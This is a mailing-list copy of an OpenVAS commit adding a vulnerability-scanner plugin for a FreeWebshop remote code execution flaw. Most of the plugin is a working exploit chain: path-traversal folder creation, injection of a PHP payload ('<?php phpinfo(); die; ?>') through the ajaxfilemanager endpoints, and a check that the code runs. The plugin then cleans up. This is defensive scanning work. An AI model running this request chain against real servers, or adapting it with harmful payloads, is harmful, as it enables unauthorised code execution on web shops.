[Openvas-commits] r12131 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Nov 17 13:11:21 CET 2011 

Author: mime
Date: 2011-11-17 13:11:12 +0100 (Thu, 17 Nov 2011)
New Revision: 12131

Added:
   trunk/openvas-plugins/scripts/gb_freewebshop_50694.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/FreeWebShop_detect.nasl
Log:
Added new plugin. Added one more dir to check

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-11-17 10:49:14 UTC (rev 12130)
+++ trunk/openvas-plugins/ChangeLog	2011-11-17 12:11:12 UTC (rev 12131)
@@ -1,5 +1,13 @@
 2011-11-17  Michael Meyer <michael.meyer at greenbone.net>
 
+	* scripts/gb_freewebshop_50694.nasl:
+	Added new plugin.
+
+	* scripts/FreeWebShop_detect.nasl:
+	Added one more dir to check.
+
+2011-11-17  Michael Meyer <michael.meyer at greenbone.net>
+
 	* scripts/secpod_wordpress_filedownload_remote_file_disc_vuln.nasl:
 	Deleted because this is alredy covered in
 	gb_wordpress_49669.nasl.

Modified: trunk/openvas-plugins/scripts/FreeWebShop_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/FreeWebShop_detect.nasl	2011-11-17 10:49:14 UTC (rev 12130)
+++ trunk/openvas-plugins/scripts/FreeWebShop_detect.nasl	2011-11-17 12:11:12 UTC (rev 12131)
@@ -71,7 +71,7 @@
 if(!get_port_state(port))exit(0);
 if(!can_host_php(port:port))exit(0);
 
-dirs = make_list("/shop",cgi_dirs());
+dirs = make_list("/freewebshop","/shop",cgi_dirs());
 
 foreach dir (dirs) {
 

Added: trunk/openvas-plugins/scripts/gb_freewebshop_50694.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_freewebshop_50694.nasl	2011-11-17 10:49:14 UTC (rev 12130)
+++ trunk/openvas-plugins/scripts/gb_freewebshop_50694.nasl	2011-11-17 12:11:12 UTC (rev 12131)
@@ -0,0 +1,157 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# FreeWebshop 'ajax_save_name.php' Remote Code Execution Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103341);
+ script_bugtraq_id(50694);
+ script_version ("$Revision$");
+
+ script_name("FreeWebshop 'ajax_save_name.php' Remote Code Execution Vulnerability");
+
+desc = "Overview:
+FreeWebshop is prone to a remote code-execution vulnerability because
+the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow attackers to execute arbitrary code
+within the context of the affected application.
+
+FreeWebshop 2.2.9 R2 is vulnerable; prior versions may also be
+affected.
+
+References:
+http://www.securityfocus.com/bid/50694
+http://www.freewebshop.org";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-17 08:34:17 +0100 (Thu, 17 Nov 2011)");
+ script_description(desc);
+ script_summary("Determine if FreeWebshop is prone to a remote code-execution vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("FreeWebShop_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+function random_mkdir() {
+
+  local_var payload;
+
+  dirname = "openvas-" + rand();
+
+  payload = "new_folder=" + dirname + "&currentFolderPath=../../../up/";
+
+  req = string(
+               "POST ",dir,"/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.1\r\n",
+	       "Host: ", host,"\r\n",
+	       "Content-Length: ", strlen(payload),"\r\n",
+	       "Content-Type: application/x-www-form-urlencoded\r\n",
+	       "\r\n",
+	       payload
+	      );
+
+  result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+  if(result !~ "HTTP/1.. 200" || dirname >!< result)exit(0);
+
+  return dirname;
+
+
+}  
+
+if(!dir = get_dir_from_kb(port:port,app:"FreeWebshop"))exit(0);
+
+function exploit(ex) {
+
+  payload = string("selectedDoc[]=",ex,"&currentFolderPath=../../../up/");
+  host = get_host_name();
+
+  req = string(
+  	     "POST ",dir,"/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_file_cut.php HTTP/1.1\r\n",
+	     "Host: ", host,"\r\n",
+	     "Content-Length: ", strlen(payload),"\r\n",
+	     "Content-Type: application/x-www-form-urlencoded\r\n",
+	     "\r\n",
+	     payload
+            );
+
+  result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+  if(result !~ "HTTP/1.. 200")exit(0);
+
+  session_id = eregmatch(pattern:"Set-Cookie: ([^;]*);",string:result);
+  if(isnull(session_id[1]))exit(0);
+  sess = session_id[1];
+
+  dirname = random_mkdir();
+  newname = rand();
+  payload = "value=" + newname + "&id=../../../up/" + dirname;
+
+  req = string(
+  	    "POST ",dir,"/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php HTTP/1.1\r\n",
+	    "Host: ", host,"\r\n",
+	    "Cookie: ", sess,"\r\n",
+	    "Content-Length: ", strlen(payload),"\r\n",
+	    "Content-Type: application/x-www-form-urlencoded\r\n",
+	    "\r\n",
+	    payload
+	    );
+
+  result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+  if("path" >!< result || newname >!< result)exit(0);
+
+  url = string(dir, "/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/inc/data.php"); 
+  req = http_get(item:url, port:port);
+  buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+  if( buf == NULL ) exit(0);
+
+  return buf;
+
+}  
+
+buf = exploit(ex:"<?php phpinfo(); die; ?>");
+
+if("<title>phpinfo()" >< buf) {
+
+  exploit(ex:""); # clean data.php
+  security_hole(port:port);
+  exit(0);
+
+}  
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_freewebshop_50694.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

More information about the Openvas-commits mailing list